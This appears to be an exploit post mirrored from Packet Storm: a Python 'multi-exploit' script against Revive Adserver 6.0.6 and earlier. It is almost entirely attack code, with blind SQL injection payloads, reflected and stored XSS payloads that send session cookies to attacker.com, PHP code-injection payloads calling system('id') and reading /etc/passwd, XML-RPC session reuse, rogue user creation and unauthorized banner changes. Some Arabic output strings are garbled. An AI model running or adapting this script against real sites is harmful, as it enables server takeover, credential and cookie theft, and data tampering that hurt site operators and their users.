Share
## https://sploitus.com/exploit?id=PACKETSTORM:222880
==================================================================================================================================
| # Title : Revive Adserver โค 6.0.6 Multi-Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.revive-adserver.com/ |
==================================================================================================================================
[+] Summary : This Python framework is designed to assess and attempt exploitation of multiple reported vulnerabilities in a Revive Adserver deployment.
It supports target discovery, optional authentication, and testing across several vulnerability categories.
[+] POC :
#!/usr/bin/env python3
import requests
import sys
import argparse
import time
import re
from urllib.parse import urljoin, quote
class ReviveExploit:
def __init__(self, target, username=None, password=None):
self.target = target.rstrip('/')
self.session = requests.Session()
self.username = username
self.password = password
self.cookies = {}
self.base_paths = ['', '/revive-adserver', '/www', '/adserver', '/revive']
def find_revive_path(self):
"""Finding the correct path to install Revive Adserver"""
for path in self.base_paths:
test_urls = [
urljoin(self.target, f"{path}/www/index.php"),
urljoin(self.target, f"{path}/index.php"),
urljoin(self.target, f"{path}/delivery/zone-include.php")
]
for url in test_urls:
try:
resp = self.session.get(url, timeout=5)
if "Revive Adserver" in resp.text or "zone-include" in resp.text or "adserver" in resp.text:
print(f"[+] ุชู
ุงูุนุซูุฑ ุนูู Revive Adserver ูู: {url}")
self.revive_path = path
return True
except:
continue
print("[-] No results found Revive Adserver")
return False
def login(self):
"""Log in as a regular user (Advertiser)"""
if not self.username or not self.password:
print("[!] Username and password not provided")
return False
login_url = urljoin(self.target, f"{self.revive_path}/www/admin/index.php")
data = {
'username': self.username,
'password': self.password,
'submit': 'Login'
}
try:
resp = self.session.post(login_url, data=data, allow_redirects=False)
if resp.status_code == 302 and ('PHPSESSID' in self.session.cookies or 'session' in resp.headers.get('Set-Cookie', '')):
print(f"[+] You have logged in as: {self.username}")
self.cookies = dict(self.session.cookies)
return True
else:
print("[-] login failed")
return False
except Exception as e:
print(f"[-] mistake: {e}")
return False
def exploit_sqli_blind(self):
"""CVE-2026-34914: Blind SQL Injection in zone-include.php"""
print("\n[+] a test Blind SQL Injection (CVE-2026-34914)...")
payloads = [
"1' AND (SELECT * FROM (SELECT(SLEEP(5)))a) -- -",
"1' AND (SELECT BENCHMARK(5000000,MD5('test'))) -- -",
"1' AND (SELECT 1 FROM users WHERE id=1)='1' -- -",
"-1' UNION SELECT version(),user(),database() -- -"
]
inject_url = urljoin(self.target, f"{self.revive_path}/delivery/zone-include.php")
for payload in payloads:
start_time = time.time()
params = {'clientid': payload, 'zoneid': '1'}
try:
resp = self.session.get(inject_url, params=params, timeout=10)
elapsed = time.time() - start_time
if elapsed >= 4:
print(f"[!] SQL Injection may be present! Response time: {elapsed:.2f} seconds")
print(f" Load: {payload}")
if "SQL syntax" in resp.text or "mysql_fetch" in resp.text:
print(f"[!] SQL error displayed! Payload: {payload}")
print(f" The truncated reply: {resp.text[:200]}")
except requests.Timeout:
print(f"[!] The halt in demand is an indicator of SQL Injection (Time-based): {payload}")
except Exception as e:
pass
def exploit_reflected_xss(self):
"""CVE-2026-34915: Reflected XSS zone-include.php"""
print("\n[+] Reflected XSS (CVE-2026-34915)...")
xss_payloads = [
'"><script>alert("XSS")</script>',
'"><img src=x onerror=alert(document.cookie)>',
"'><svg/onload=alert('XSS')>",
'"><script>fetch("http://attacker.com/steal?c="+document.cookie)</script>',
'javascript:alert("XSS")'
]
inject_url = urljoin(self.target, f"{self.revive_path}/delivery/zone-include.php")
for payload in xss_payloads:
params = {'clientid': payload, 'zoneid': '1'}
try:
resp = self.session.get(inject_url, params=params)
if payload.replace('"', '"') != resp.text and payload in resp.text:
print(f"[!] Reflected XSS Possible! Load: {payload}")
print(f"The load appears in the response without filtering.")
except Exception as e:
pass
def exploit_rce_delivery_limitations(self):
"""CVE-2026-34916 & CVE-2026-44959: RCE via delivery limitations"""
print("\n[+] a test Remote Code Execution (CVE-2026-34916 & CVE-2026-44959)...")
rce_payloads = [
"'; system('id'); //",
"'; phpinfo(); //",
"'; echo file_get_contents('/etc/passwd'); //",
"campaignDelimiterComponent}}]; system('id'); /*",
"}}]; phpinfo(); /*"
]
edit_urls = [
urljoin(self.target, f"{self.revive_path}/www/admin/banner-edit.php"),
urljoin(self.target, f"{self.revive_path}/www/admin/campaign-edit.php")
]
for edit_url in edit_urls:
for payload in rce_payloads:
data = {
'submit': 'Save',
'bannerid': '1',
'campaignid': '1',
'limitations[0][logical]': payload,
'limitations[0][component]': 'deliveryLimitations'
}
try:
resp = self.session.post(edit_url, data=data, cookies=self.cookies)
if "saved" in resp.text.lower() or "success" in resp.text.lower():
print(f"[!] ุชู
ุญูุธ ุงูุญู
ููุฉ! ูุฏ ูููู RCE ู
ู
ููุงู: {payload}")
print(f" URL: {edit_url}")
except:
pass
def exploit_stored_xss_fullname(self):
"""CVE-2026-44956: Stored XSS via full name"""
print("\n[+] Stored XSS (CVE-2026-44956) - full name...")
xss_payload = '<script>new Image().src="http://attacker.com/steal?c="+document.cookie</script>'
profile_url = urljoin(self.target, f"{self.revive_path}/www/admin/user-edit.php")
data = {
'submit': 'Save',
'userid': '1',
'full_name': xss_payload,
'email': 'test@example.com',
'username': self.username
}
try:
resp = self.session.post(profile_url, data=data, cookies=self.cookies)
if "saved" in resp.text.lower():
print(f"[!] XSS has been stored in full name! Payload: {xss_payload}")
print("The execution will take place when the manager watches. userlog-details.php")
except Exception as e:
print(f"[-] mistake: {e}")
def exploit_xmlrpc_session_reuse(self):
"""CVE-2026-34917: Session reuse XML-RPC"""
print("\n[+] Improper Authentication - Session Reuse (CVE-2026-34917)...")
xmlrpc_url = urljoin(self.target, f"{self.revive_path}/www/api/xmlrpc/index.php")
xml_payload = '''<?xml version="1.0"?>
<methodCall>
<methodName>ox.getAdvertiserList</methodName>
<params>
<param><value><string>{session_id}</string></value></param>
<param><value><string></string></value></param>
</params>
</methodCall>'''.format(session_id=self.cookies.get('PHPSESSID', ''))
try:
resp = self.session.post(xmlrpc_url, data=xml_payload,
headers={'Content-Type': 'text/xml'})
if "faultCode" not in resp.text and "struct" in resp.text:
print("[!] The session can be reused to access the manager's API.!")
print(f"Reply: {resp.text[:200]}")
except:
pass
def exploit_username_xss_bypass(self):
"""CVE-2026-44961: Bypass username verification in XML-RPC"""
print("\n[+] Incomplete Disallowed Inputs (CVE-2026-44961)...")
xmlrpc_url = urljoin(self.target, f"{self.revive_path}/www/api/xmlrpc/index.php")
malicious_usernames = [
'<script>alert("XSS")</script>',
'admin_hacker"><img src=x onerror=alert(1)>',
'../../../../etc/passwd'
]
for bad_user in malicious_usernames:
xml_payload = f'''<?xml version="1.0"?>
<methodCall>
<methodName>ox.addUser</methodName>
<params>
<param><value><string>admin_session</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><struct>
<member><name>username</name><value><string>{bad_user}</string></value></member>
<member><name>password</name><value><string>hacked123</string></value></member>
<member><name>email</name><value><string>hacker@evil.com</string></value></member>
</struct></value></param>
</params>
</methodCall>'''
try:
resp = self.session.post(xmlrpc_url, data=xml_payload,
headers={'Content-Type': 'text/xml'})
if "faultCode" not in resp.text and "boolean" in resp.text:
print(f"[!] Verification was bypassed and a username was created.: {bad_user}")
except:
pass
def exploit_improper_access_control(self):
"""CVE-2026-34912, CVE-2026-34913, CVE-2026-44958: Linking entities without authorization"""
print("\n[+] ุงุฎุชุจุงุฑ Improper Access Control - Linking/Modifying without authorization...")
zone_include_url = urljoin(self.target, f"{self.revive_path}/www/admin/zone-include.php")
data = {
'submit': 'Save',
'zoneid': '2',
'bannerid': '1'
}
try:
resp = self.session.post(zone_include_url, data=data, cookies=self.cookies)
if "success" in resp.text.lower() or "linked" in resp.text.lower():
print("[!] It was linked banner by zone The user does not own it - violation of rights!")
except:
pass
banner_edit_url = urljoin(self.target, f"{self.revive_path}/www/admin/banner-edit.php")
disable_data = {
'submit': 'Save',
'bannerid': '3',
'status': '0'
}
try:
resp = self.session.post(banner_edit_url, data=disable_data, cookies=self.cookies)
if "success" in resp.text.lower():
print("[!] Disabled banner without validity (CVE-2026-44958)!")
except:
pass
def generate_report(self):
"""Generate a comprehensive report of the discovered vulnerabilities."""
print("\n" + "="*60)
print("Test Report Revive Adserver")
print("="*60)
print(f"the goal: {self.target}")
print(f"user: {self.username}")
print(f"Installation path: {getattr(self, 'revive_path', 'unavailable')}")
print("\nRecommendations:")
print("1. Update Revive Adserver to version 6.0.7 or later")
print("2. Change all passwords immediately")
print("3. Check for unauthorized files or users")
print("4. Disable the XML-RPC API if not necessary.")
print("5. Review system logs for suspicious activity")
print("="*60)
def run_all(self):
"""Perform all tests"""
if not self.find_revive_path():
return
if self.username and self.password:
if not self.login():
print("[!] Continue without logging in...")
self.exploit_sqli_blind()
self.exploit_reflected_xss()
self.exploit_rce_delivery_limitations()
self.exploit_stored_xss_fullname()
self.exploit_xmlrpc_session_reuse()
self.exploit_username_xss_bypass()
self.exploit_improper_access_control()
self.generate_report()
def main():
parser = argparse.ArgumentParser(description='Revive Adserver <= 6.0.6 Multi-Exploit PoC')
parser.add_argument('--target', required=True, help='Goal (example): https://example.com)')
parser.add_argument('--username', help='regular username (Advertiser)')
parser.add_argument('--password', help='password')
parser.add_argument('--action', default='all',
choices=['all', 'sqli', 'xss', 'rce', 'iac', 'report'],
help='Test type')
args = parser.parse_args()
exploit = ReviveExploit(args.target, args.username, args.password)
if args.action == 'all':
exploit.run_all()
elif args.action == 'sqli':
exploit.find_revive_path()
exploit.exploit_sqli_blind()
elif args.action == 'xss':
exploit.find_revive_path()
exploit.exploit_reflected_xss()
exploit.exploit_stored_xss_fullname()
elif args.action == 'rce':
exploit.find_revive_path()
if args.username and args.password:
exploit.login()
exploit.exploit_rce_delivery_limitations()
elif args.action == 'iac':
exploit.find_revive_path()
if args.username and args.password:
exploit.login()
exploit.exploit_improper_access_control()
exploit.exploit_xmlrpc_session_reuse()
elif args.action == 'report':
exploit.find_revive_path()
exploit.generate_report()
if __name__ == "__main__":
print("""
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Revive Adserver Exploit PoC - โ
โ SQLi, XSS, RCE, Access Control, Auth Bypass โ
โ Affected update: <= 6.0.6 โ
โ by indoushka โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
""")
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================